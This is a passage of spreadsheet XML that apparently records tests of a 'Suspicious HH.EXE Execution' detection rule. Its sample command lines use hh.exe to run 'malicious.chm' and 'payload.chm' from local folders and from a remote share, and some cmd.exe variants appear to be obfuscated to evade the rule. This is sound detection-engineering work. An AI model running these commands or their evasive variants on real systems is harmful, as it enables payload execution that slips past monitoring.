        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B74" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C74" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D74" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E74" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F74" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G74" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H74" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I74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74" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K74" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="75" ht="15.75" customHeight="1" s="42">
      <c r="A75" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B75" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C75" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D75" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E75" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F75" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G75" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H75" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I75" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J75" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K75" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="76" ht="15.75" customHeight="1" s="42">
      <c r="A76" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B76" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C76" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D76" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E76" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F76" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G76" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H76" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I76" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J76" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K76" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="77" ht="15.75" customHeight="1" s="42">
      <c r="A77" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B77" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C77" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D77" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E77" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F77" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G77" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H77" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I77" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J77" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K77" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="78" ht="15.75" customHeight="1" s="42">
      <c r="A78" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B78" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C78" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D78" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E78" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F78" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G78" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H78" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I78" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J78" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K78" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="79" ht="15.75" customHeight="1" s="42">
      <c r="A79" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B79" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C79" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D79" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E79" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F79" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G79" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H79" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I79" s="43" t="n"/>
      <c r="J79" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K79" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="80" ht="15.75" customHeight="1" s="42">
      <c r="A80" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B80" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C80" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D80" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E80" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F80" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G80" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H80" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I80" s="43" t="n"/>
      <c r="J80" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K80" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="81" ht="15.75" customHeight="1" s="42">
      <c r="A81" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B81" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C81" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D81" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E81" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F81" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G81" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H81" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I81" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J81" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K81" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="82" ht="15.75" customHeight="1" s="42">
      <c r="A82" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B82" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C82" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D82" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E82" s="44" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F82" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G82" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H82" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I82" s="44" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J82" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K82" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="83" ht="15.75" customHeight="1" s="42">
      <c r="A83" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B83" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C83" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D83" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E83" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F83" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G83" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H83" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I83" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J83" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K83" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="84" ht="15.75" customHeight="1" s="42">
      <c r="A84" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B84" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C84" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D84" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E84" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F84" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G84" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H84" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I84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84" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K84" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="85" ht="15.75" customHeight="1" s="42">
      <c r="A85" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B85" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C85" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D85" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E85" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F85" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G85" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H85" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I85" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J85" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K85" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="86" ht="15.75" customHeight="1" s="42">
      <c r="A86" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B86" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C86" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D86" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E86" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F86" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G86" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H86" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I86" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J86" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K86" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="87" ht="15.75" customHeight="1" s="42">
      <c r="A87" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B87" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C87" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D87" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E87" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F87" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G87" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H87" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I87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87" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K87" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="88" ht="15.75" customHeight="1" s="42">
      <c r="A88" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B88" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C88" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D88" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E88" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F88" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G88" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H88" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I88" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J88" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K88" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="89" ht="15.75" customHeight="1" s="42">
      <c r="A89" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B89" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C89" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D89" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E89" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F89" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G89" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H89" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I89" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J89" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K89" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="90" ht="15.75" customHeight="1" s="42">
      <c r="A90" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B90" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C90" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D90" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E90" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F90" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G90" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H90" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I90" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J90" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K90" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="91" ht="15.75" customHeight="1" s="42">
      <c r="A91" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B91" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C91" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D91" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E91" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F91" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G91" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H91" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I91" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J91" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K91" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="92" ht="15.75" customHeight="1" s="42">
      <c r="A92" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B92" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C92" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D92" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E92" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F92" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G92" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H92" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I92" s="43" t="n"/>
      <c r="J92" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K92" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="93" ht="15.75" customHeight="1" s="42">
      <c r="A93" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B93" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C93" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D93" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E93" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F93" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G93" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H93" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I93" s="43" t="n"/>
      <c r="J93" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K93" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="94" ht="15.75" customHeight="1" s="42">
      <c r="A94" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B94" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C94" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D94" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E94" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F94" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G94" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H94" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I94" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J94" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K94" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="95" ht="15.75" customHeight="1" s="42">
      <c r="A95" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B95" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C95" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D95" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E95" s="44" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F95" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G95" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H95" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I95" s="44" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J95" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K95" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="96" ht="15.75" customHeight="1" s="42">
      <c r="A96" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B96" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C96" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D96" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E96" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F96" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G96" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H96" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I96" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J96" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K96" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="97" ht="15.75" customHeight="1" s="42">
      <c r="A97" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B97" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C97" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D97" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E97" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F97" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G97" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H97" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I97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97" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K97" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="98" ht="15.75" customHeight="1" s="42">
      <c r="A98" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B98" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C98" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D98" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E98" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F98" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G98" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H98" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I98" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J98" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K98" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="99" ht="15.75" customHeight="1" s="42">
      <c r="A99" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B99" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C99" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D99" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E99" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F99" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G99" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H99" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I99" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J99" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K99" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="100" ht="15.75" customHeight="1" s="42">
      <c r="A100" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B100" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C100" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D100" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E100" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F100" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G100" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H100" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I100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00" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K100" s="44" t="b">
        <v>0</v>
      </c>
    </row>
